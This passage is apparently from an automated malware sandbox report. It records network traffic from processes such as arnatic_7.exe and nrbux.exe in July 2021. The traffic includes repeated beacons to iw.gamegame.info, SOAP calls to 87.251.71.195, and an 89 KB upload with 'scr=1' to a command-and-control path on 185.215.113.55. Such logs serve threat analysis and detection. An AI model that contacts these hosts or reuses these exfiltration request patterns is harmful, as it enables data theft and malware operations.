                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b348c60000cae4ed8f5000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=aO%2FAF78H87Z7B0Taa0BcfE6%2Flg3TH3HxdK1ikYnO9Ad9fdUKCv%2B4wZAVsK8uC3lpsVwS2AgMhpF2QsCYYJK2TOADf5th%2BE9zIJCR7JAQx6U2nRkzTEIQqtDZONI05A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66862187abbdcae4-ARN
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:24:00 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b370a7000016498cb43000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=4F6lRxUzI8IgVgFEENSLp2Z1tueQrYOpFrO%2BzFaOZIVnqzxWAWVnq1vwXy8SpA6o8B3N4ikEeaqABWCsIT2B7wQt0tQebtO%2BnRhipKpTzttcX4DTE2aSiJiVabDs8g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668621c778c31649-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:24:10 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b398d500001bbddf821000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=epk3Z7WwIRQyfFCQfI3nOk%2BeOCq%2FWxU1KvrEXt4QBQ7R0n562JdZgCwZm%2B%2FSPxKPinvkknj1nNUS5l%2Brpi36fAeMXhYjp0JmTa%2FXZCqsjW8TKbcVmTrsqeBE9h5yow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66862207bb231bbd-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:24:21 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b3c0d100007cfa49a75000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=34lKJ9lbZVX96xlnHClEiMC3JxgU60%2FcxbvG5ojkrMq9e4LLVkO%2FWkRgJrGDLJ6mMv6jBIgOYXDai%2F1XCCEYi3uR2eE9EgNuDRDaoYD6WLyEvwsVRnJRbfwq0KybsQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66862247889d7cfa-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:24:31 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b3e95b00006259fa3a7000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=kTAbYmJacvNSBFp3Cq8RQ3CTGXpN%2FV3esbkJ%2B1U2ZD%2Bvupku%2BybqtETMVFc8plRkZ7pv9KRr6eEjIkbXjbUIFATw92zAPYg%2Bt3U6gkjCfreEBLLsH2bQVEo8l1NTgA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668622889d906259-OTP
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:24:42 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b414940000f015a694c000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Hds93MBvJTXHKKxJ7%2FmhvnQK5D33ZD5XGi8wI%2Fz1wMosN%2F4w22P0D2Br8y1zvsDoa2gCN9%2BFuFnZsJKO4tQXk30F%2F5kgwE7ERb%2BTS60M0saENZYIO2l7cLiDRugFeA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668622cdbe46f015-EWR
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:24:52 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----26852cccdc37776d4a2ad18a0a70534d
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 89439
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:24:52 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b43d310000fa8c79367000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=aZIbpCvx7tcssmutT7Km20LbQJT%2BVjENqLpVw6kZ%2Bj2jOocqoJetp4Yf2iPRuZpaOVozOku%2FYH0ooipeH%2B%2BGBTOOERtvzhhgRFmJB7HFeKoT%2BNgIqBoTc7%2FlR2Z%2FRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686230ebf0efa8c-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:25:03 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b465930000624d4a8af000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=ltIxD6OAL7U1Uzc6jR7QP4Chqmq5paR%2B40uop44SOQ%2FLnm3WXg%2BYjtc34vn2OmxjEzyYfdJAohl5ABfYeCpn0X%2F7iHfeJPLhTYyKGdrnm%2B8BJKIuQ1qs17rNEaVOHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686234f5c17624d-OTP
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:25:13 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b48da0000041517b2c0000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=gfisXgFrOfePt6TjZBeFQl4hAX%2BcjCtUCRPq3BBdk2mzLXwZgApQ0AxE%2Ftu2OqPlrOA1V6RD%2FGzwIszRO31HdMeHgRR9gv4E4oJSx0EWrla3kRS1GQ%2Fjukdh8h4mpg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686238f6f314151-HAM
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        star-mini.c10r.facebook.com
                                                                                                                                                                                        star-mini.c10r.facebook.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        31.13.83.36
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://www.facebook.com/
                                                                                                                                                                                        arnatic_4.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        31.13.83.36:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET / HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                        Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        viewport-width: 1920
                                                                                                                                                                                        Sec-Fetch-Dest: document
                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                        Sec-Fetch-User: ?1
                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                        Host: www.facebook.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Alt-Svc: h2="facebook2b5efqy23fbcbpzs5xkfqfuwjc3csaqqvkggj3pkwkb25aid.onion:443"; ma=86400
                                                                                                                                                                                        x-fb-rlafr: 0
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                                                                                                                        Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                        Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                        X-FB-Debug: 862ncP7T9reclwX1oFvfPJeZckTEeXyN03AacdbNMazjXJTGmedPgbtWAuHmVKpZdnT5L4yt1WImUpUB7TLiwg==
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:25:17 GMT
                                                                                                                                                                                        Priority: u=3,i
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
